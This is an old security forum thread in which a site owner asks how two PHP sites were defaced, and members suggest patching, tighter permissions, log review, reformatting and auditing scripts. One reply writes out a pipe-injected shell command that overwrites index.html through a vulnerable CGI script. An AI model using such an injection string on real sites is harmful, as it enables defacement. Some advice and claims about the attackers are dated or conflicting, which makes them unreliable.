website defacement
Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: website defacement

  1. #1
    Junior Member
    Join Date
    Sep 2003
    Posts
    3

    website defacement

    Recently I've had 2 websites defaced. Both run php/mySQL.
    In one, the index.php was replaced or overwritten with the message:
    "Tech Team ownz u FreeBSD"
    My host for that site uses a Free BSD os.

    On the other site, they replaced or overwrote my index.html with the message:
    Tech Team ownz your box."

    How would these folks go about doing this? I really want to take measures so it doesn't happen again.
    Thanks

  2. #2
    Senior Member
    Join Date
    Mar 2003
    Posts
    301
    The only real measures you can take is to turn off any unneccesary services and update all the patches for your systems. well actually your host would have to do that unless you work at it. I would give em a call and try to get them to sort it all out.

    PeacE
    -BoB
    #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
    ($k,$n)=@ARGV;$m=unpack(H.$w,$m.\"\\0\"x$w),$_=`echo \"16do$w 2+4Oi0$d*-^1[d2%
    Sa2/d0<X+d*La1=z\\U$n%0]SX$k\"[$m*]\\EszlXx++p|dc`,s/^.|\\W//g,print pack(\'H*\'
    ,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die\"$0 [-d] k n\\n\")&~1)/2)

  3. #3
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Actually, without knowing the setup, the first thing that comes to mind is permissions. Directory permissions should only be 711 (rwx--x--x) and files should only be 744 (rwxr--r--). I'd also check for any trojans or other items running before doing any patches. Remove any potential "repeat" type items that could cause the site to be defaced again. Get rid of any unused service (no, you don't need games, email, etc running on the server). Check history files and logs. You need to find out first the how of what they did before you lock it down (which should be done before the machine is connected to the Net).

    Download patches, disconnect machine, update machine, restart services, double check no extra "things" running and reconnect. Do regular checks of logs and activities of users on the system.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  4. #4
    AO Decepticon CXGJarrod's Avatar
    Join Date
    Jul 2002
    Posts
    2,038

    Re: website defacement

    Originally posted here by samboll

    My host for that site uses a Free BSD os.
    Is this site hosted through a hosting company? If so, then I would look at another company to host your website.
    N00b> STFU i r teh 1337 (english: You must be mistaken, good sir or madam. I believe myself to be quite a good player. On an unrelated matter, I also apparently enjoy math.)

  5. #5
    Banned
    Join Date
    May 2003
    Posts
    1,004
    If you run a commercial site in the US your host is in a very actionable position.

    If you are paying them it is not ok that they have failed to secure the site. Unless you went through and altered the permission of your site to allow your default documents to be written to by the webservice user/cgi user and uploaded weak scripts.
    Not only that but since they run FreeBSD they will most likely have an exceptionally difficult time demonstrating that they took due care as no TFM exists for FreeBSD at this time and they would have needed to create their own _and_ get it approved by someone with clout, which seems unlikely at best since if they cared that much about security they 1. would not be running FreBSD and 2. would not be having their client's websites defaced.

    If it isn't a commercial website, your losses were likely so small (just replacing the page) that further action prolly wouldn't be worth your time.

    catch

  6. #6
    Banned
    Join Date
    Sep 2003
    Posts
    61
    Tech Team ownz u

    i heard of this group, and they are GOOD!
    I mean that they know what there doing.
    there a chinese based organisation.


    anyhow best of luck, and i hope you solve your problem.
    And MsMitten's idea sounds pretty good to me.

    Cheer's

  7. #7
    Junior Member
    Join Date
    Sep 2003
    Posts
    3
    Originally posted here by MsMittens
    Actually, without knowing the setup, the first thing that comes to mind is permissions. Directory permissions should only be 711 (rwx--x--x) and files should only be 744 (rwxr--r--). I'd also check for any trojans or other items running before doing any patches. Remove any potential "repeat" type items that could cause the site to be defaced again. Get rid of any unused service (no, you don't need games, email, etc running on the server). Check history files and logs. You need to find out first the how of what they did before you lock it down (which should be done before the machine is connected to the Net).

    Download patches, disconnect machine, update machine, restart services, double check no extra "things" running and reconnect. Do regular checks of logs and activities of users on the system.
    This sounds sensible. My current directory permissions are 755 and files are 644.

    Also, I was wondering about the Free BSD. My host will move me to a Linux on Apache if I so desire. Would this be worth it?

  8. #8
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Well it's not going to make a difference if the host isn't locking down FreeBSD. Often errors done on one OS are carried over to others. Have you asked them how the defacement occurred and if they have fixed the problem?
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  9. #9
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    Unlike what the other posters suggest (locking down the system), I suggest that you reformat all the affected (or possibly affected boxes). This might of course include your entire hosting operation. If there is any possibility that the attackers compromised a machine, it MUST be reformatted.

    Patching an already compromised system is closing the door after the horse has bolted

    No ... seriously... any intruder may have left any number of back doors, not all of which you may be able to detect. So no amount of patching will necessarily help, as the attacker could come straight back in through one of their back doors.

    Also they could have used one machine as a springboard to attack your other boxes (this avoiding your firewall). So you can't take any chances.

    Because they defaced sites however, I'd suggest kiddies rather than real skilled individuals. Bear in mind that they probably started the attack by compromising your PHP application - so ensure that you audit it carefully.

    Restoring backups is also a tricky process. You should take great care not to restore any executable content (this of course includes PHP scripts and their include files etc) from a backup taken after the compromise.

    If you can, take the code from a copy held on an uncompromised box (for example, a staging server or development machine)

    Data should be audited very carefully to spot any surprises they may have left ... at the very least you should check any users databases to see if there are any extra users in, and probably should force a password change on everybody to be on the safe side.

  10. #10
    Senior Member
    Join Date
    Apr 2002
    Posts
    1,050
    TechTeam are from brazil the most likely it was a cgi script and they just done |echo TechTeam ownz blah blah >index.html| my suggestion would be to look for any vulnerable cgi scripts on you're website and remove them if you're not using them the access they would have had was probably the nobody account anyways if that has been locked down and doesent have wget or compiler rights you should be fine does the admin of the boxes know they were defaced ? has he found the problem at all ?
    By the sacred **** of the sacred psychedelic tibetan yeti ....We\'ll smoke the chinese out
    The 20th century pharoes have the slaves demanding work
    http://muaythaiscotland.com/

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •